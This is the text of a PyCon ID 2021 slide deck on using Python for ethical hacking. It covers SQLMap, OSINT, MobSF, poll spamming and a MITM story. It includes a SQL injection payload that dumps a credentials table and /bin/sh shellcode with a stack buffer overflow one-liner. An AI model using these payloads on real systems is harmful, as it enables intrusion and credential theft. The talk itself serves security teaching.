The Importance of Python for Ethical Hacking Created by Yahya for PyCon ID 2021

!! DISCLAIMER !! - All on this presentation is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. - Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking.The author is not promoted hacking or cracking. - Do not attempt to violate the law with anything contained here. - You shall not misuse the information to gain unauthorised access. However you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal. Thanks to my wife and my friend that makes this presentation happen 2

Hello! I AM YAHYA F. ALFATIH Engineer Lead at eFishery Love to automate anything DevOps, SoftEng & CyberSec Researcher OSS&Web3 Enthusiast Creator of NeMo, BigBrother Test and other Junk 3 buk4nyahya A lazy abnormal tech savy. @BukanYahya k1m0ch1

2021 Hacking ? $2M bug bounty Profitable professional working on the internet (https://decrypt.co/83997/polygon-dodges-850m-hack-pays-re cord-2m-bounty) Cybercrime-as-service Crime as easy as you manage spreadsheet 4

5

Hacking & Ethical Hacking The differences where hackers activity is using ethic code or not Easy + Hack = Python The only language hackers commonly easy to use 6

Hackers really use python ? Really ? 7

Language used for exploit in exploit-db.com (from 45k record): 64 JAVA 1144 PHP 1894 HTML 2822 Perl 2956 C 3870 Python 1999+ Text 8

Tools pentesting on github commonly written with python 9

Also to proof the concept of CVE is widely written with python 10

So why hackers commonly use python ? Hacking Tools It is used by SQLMap, theHarvester and MobSF Productive & Speedy The most accessible programming languages available Wide Community Hackers community really can help with python Easy PoC Its not hard to Proof of Concept of the vulnerability or CVE ByteCode Shell Inject Fun with buffer0verlow ? try python For Fun! 🤣🤣🤣🤣 11

Hacking Tools Python as the swiss army Knife of hackers tools 12

Common Hackers tools written with python SQLMap theHarvester MobSF 13 This tools very common around hackers for sqlinjection, OSINT and debug the android apps

SQLMap - Automatic SQL Injection and database take over This tools can detect all of the variant of sql injection with more than 100 sql injection payload, it has more feature than that from explore database to dump the database 14

SQL injection there is an attack method that usually hackers use to trick the application to execute any command on the Database, from this kind of query that simply select the news like this 15 select * from news where news_id=5

SQL injection Into something that select other table, that store more sensitive information like this 16 select * from news where news_id=5 union select 1,2,concat(username,0x3a,password),4,5 from credentials This is only one variant of the sql injection from the 9 variant of sql injection with more than 100 sql injection payload, you can see full in here https://github.com/payloadbox/sql-injection-payload-list

Fix SQL injection Because sql injection is commonly involve with data input, so it is only need to sanitize the input, so the hackers can’t manipulate the query 17

theHarvester - the internet gold miner tools This is a very cool tools to dig a gold mine on the internet, the tools is simple, you just put the domain and it will search “ANY” information on the internet, even the sensitive one. How it work ? it is only use the search engine, from common search engine google, duck duck go, bing and the speciality search engine, GHDB, shodan and zoomeye and all of this commonly call OSINT 18

OSINT - Open Source Intelligence A process mostly used for collecting the publicly available source for intelligence context, you can try this by simply using the specific keyword on google or usually hackers call this GHDB (Google Hacking DB). Professionally a person who can do this is called the investigator 19

OSINT - Open Source Intelligence Why OSINT is so powerful ? 20

MobSF - Mobile Security Framework This tools can analyze, decompile, sniffing the API and do many things to analyze the Android application, it has a two great feature, Static Analysis and Dynamic Analysis 21

How Powerful MobSF ? I made the analysis of the Peduli Lindungi Application on twitter, github and youtube that peduli lindungi application actually send the “unusual” data to “untrusted tracker” 22

Automate & Proof of Concept Its easy to automate using python 23

Mentimeter - interactive tools to vote 24 Some people or group love to use this tools as interactive tools for voting or just some fun with group

Incognito browser to trick the sessions 25

Just request a new identifier 26

JEMAWA - menti spammer 27 https://github.com/k1m0ch1/jemawa-menti-choices-spammer

Inject shellcode into stack buffer overflow Python is pretty handy to inject some binary code into memory 28

29 kernel stack heap data text 0xffffff... 0x000... Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

30 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 8 bytes 0x70 = p 0x61 = a 0x73 = s 0x73 = s 0x77 = w 0x6f = o 0x72 = r 0x64 = d

31 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

32 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

33 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe490 - 0x7fffffffe4d8

34 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

35 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

36 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffed60 \x31\xc0\x48\xbb\xd1\x9d\x96\x91\x d0\x8c\x97\xff\x48\xf7\xdb\x53\x54\ x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0 f\x05 27 bytes shell code /bin/sh http://shell-storm.org/shellcode/files/shellcode-806.php $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7 \xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 63')

37 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff...

38 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe480 0x7fffffffe480 \x80\xe4\xff\xff\xff\x7f Memory address $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7 \xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 61 + “\x80\xe4\xff\xff\xff\x7f”’)

39 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe480

40 Int main ().. parameters return base pointer buffer(80) 0x000... 0xffffff... 0x7fffffffe480

Demo the client server buffer overflow Using python 41

For Fun! The Strawberry Juice Day Everything is strawberry juice!! 42

43 Status Quo

44 Private Network and Public Network in the same network Call to the Adventure

45 Refusal of call

46 Meeting with the Mentor (MITM Attack)

47 Crossing the treshold

48

49 Test, Allies, Enemies

50 Test, Allies, Enemies

51 Test, Allies, Enemies

Approach the innermost cave 52

Ordeal 53

Ordeal 54

Ordeal 55

Reward 56

Reward 57

Road back 58

Return with elixir 59

The Bug and how to fix it 1. “REAL” Separate network 2. HTTPS EVERYWHERE, even LAN 3. Token Expiration 60

Hacking with Python is absolutely amazing 61

Thanks to! 62 Computerphile Youtube Channel Youtube videos about computer and internet stuff LiveOverflow Wannabe hacker.. Youtube video about various IT security topics Habibie Faried Hacker Buddy He mades a good article on medium https://habibiefaried.mediu m.com/ sec_r0 Gojektech security engineer He made a lot of cool stuff with his simple explanation image

Thanks! ANY QUESTIONS? You can find me at yahya.kimochi@gmail.com 63 buk4nyahya @BukanYahya k1m0ch1 k1m0ch1